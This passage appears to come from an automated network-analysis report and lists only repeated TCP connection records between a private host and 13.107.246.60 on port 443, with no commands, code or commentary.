Source: global trafficTCP traffic: 192.168.2.7:49705 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49705
Source: global trafficTCP traffic: 192.168.2.7:49705 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49705 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49705
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49705
Source: global trafficTCP traffic: 192.168.2.7:49705 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49705
Source: global trafficTCP traffic: 192.168.2.7:49705 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49705
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49703
Source: global trafficTCP traffic: 192.168.2.7:49703 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49703
Source: global trafficTCP traffic: 192.168.2.7:49703 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49703
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49703
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49703
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49703
Source: global trafficTCP traffic: 192.168.2.7:49703 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49703 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49703 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49703
Source: global trafficTCP traffic: 192.168.2.7:49703 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49703
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49705
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49705
Source: global trafficTCP traffic: 192.168.2.7:49705 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49705 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49705 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49705
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
